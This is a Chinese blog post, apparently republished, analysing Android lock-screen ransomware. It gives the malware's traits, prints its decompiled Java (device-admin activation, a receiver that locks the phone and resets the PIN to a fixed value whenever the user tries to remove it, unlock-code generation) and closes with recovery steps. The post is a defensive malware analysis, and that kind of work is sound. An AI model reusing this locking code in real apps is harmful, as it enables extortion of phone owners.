锁机病毒小结
来源:互联网 发布:keynote软件下载 编辑:程序博客网 时间:2024/06/05 03:00
锁机勒索病毒主要特征:
1、假冒成各种刷砖、刷人气、刷皮肤等应用,要求激活设备管理器甚至授予root权限。
2、病毒发作后,留下制毒者的联系方式,勒索钱财。
锁机勒索病毒主要代码:
1、激活设备管理器
private void activiteDevice() { Class v8; M v0 = this; Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN"); ComponentName v5 = null; ComponentName v6 = null; M v7 = v0; try { v8 = Class.forName("com.cjk.MyAdmin"); } catch(ClassNotFoundException v5_1) { throw new NoClassDefFoundError(v5_1.getMessage()); } super(((Context)v7), v8); v1.putExtra("android.app.extra.DEVICE_ADMIN", ((Parcelable)v5)); v0.startActivityForResult(v1, 0); } @Override public void onCreate(Bundle arg6) { LogCatBroadcaster.start(this); super.onCreate(arg6); this.activiteDevice(); }2、设置PIN码密码
public class MyAdmin extends DeviceAdminReceiver { public MyAdmin() { super(); } @Override public CharSequence onDisableRequested(Context arg10, Intent arg11) { String v4 = Integer.toString(5406); this.getManager(arg10).lockNow(); this.getManager(arg10).resetPassword(v4, 0); return super.onDisableRequested(arg10, arg11); } @Override public void onEnabled(Context arg17, Intent arg18) { Class v11; MyAdmin v0 = this; Context v1 = arg17; Intent v2 = arg18; String v4 = Integer.toString(5406); Intent v8 = null; Intent v9 = null; Context v10 = v1; try { v11 = Class.forName("com.cjk.s"); } catch(ClassNotFoundException v8_1) { throw new NoClassDefFoundError(v8_1.getMessage()); } super(v10, v11); v8.setFlags(268435456); v1.startService(v8); v0.getManager(v1).resetPassword(v4, 0); super.onEnabled(v1, v2); } @Override public void onPasswordChanged(Context arg10, Intent arg11) { String v4 = Integer.toString(5406); this.getManager(arg10).lockNow(); this.getManager(arg10).resetPassword(v4, 0); super.onPasswordChanged(arg10, arg11); } @Override public void onReceive(Context arg8, Intent arg9) { Log.i("------", "onReceive-----"); super.onReceive(arg8, arg9); }}3、生成序列号
@Override public void onCreate() { s v0 = this; ADRTLogCatReader.onContext(v0, "com.aide.ui"); super.onCreate(); v0.pass = ((long)(Math.random() * (((double)100000000)))); v0.passw = new Long(v0.pass + (((long)520))); v0.des = new DU("flower"); s v4 = v0; try { v4.des = new DU(v0.des.decrypt("c29fe56fa59ab0db")); } catch(Exception v4_1) { } v0.share = v0.getSharedPreferences("Flowers", 0); v0.editor = v0.share.edit(); if(v0.share.getLong("m", ((long)0)) == (((long)0))) { v0.editor.putLong("m", v0.pass); v0.editor.commit(); v4 = v0; try { v4.editor.putString("passw", v0.des.encrypt(new StringBuffer().append("").append(v0. passw).toString())); v0.editor.commit(); } catch(Exception v4_1) { } if(v0.is(v0.getApplicationContext())) { v0.ppss = new StringBuffer().append(v0.share.getLong("m", ((long)8))).append("").toString(); v4 = v0; s v5 = v0; try { v4.password = v5.des.decrypt(v0.share.getString("passw", "")); } catch(Exception v4_1) { } new 100000000(v0).start(); return; } v4 = v0; try { v4.editor.putLong("m", Long.parseLong(v0.des.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9"))); v0.editor.commit(); v0.editor.putString("passw", "e60b6ba97b41a1c7a31f1228d55280a8243703be7d4aa15c"); v0.editor.commit(); } catch(Exception v4_1) { } } }锁屏勒索病毒的应对方法:
1、反编译APK,找出关键代码,得到相应的计算公式,输入正确的密码后取消激活设备管理器,卸载应用。
2、对于加壳类的锁机勒索软件,暂时没有什么应对方法,一般都是手机预先开启USB调试,使用ADB命令冻结应用,然后卸载应用,删除/data/system文件夹下的password.key文件
如果碰到该类锁机病毒,可以将病毒样本包发送到我的工作邮箱:18300070889@139.com
谢谢
1 0
- 锁机病毒小结
- 病毒样本分析小结
- 锁机病毒续
- 手机锁机病毒解锁清除教程
- 根据悍马病毒小结android病毒如何提取root权限
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- ???????病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 病毒
- 每天一个c++小程序(1):快速排序
- bzoj1068(区间dp,字符串压缩)
- nginx按日期存储日志
- python中的下划线
- CSU 1113 Updating a Dictionary
- 锁机病毒小结
- 开源跨平台物联网通讯框架ServerSuperIO 2.0(SSIO)下载
- 13、canvas标签之合成
- Binary
- mysql_fetch_object和mysql_fetch_array
- 文件操作(NSFileManager)
- 16.8.17 C组总结
- Windows Server 2012 R2英文版安装中文包
- 新纪录
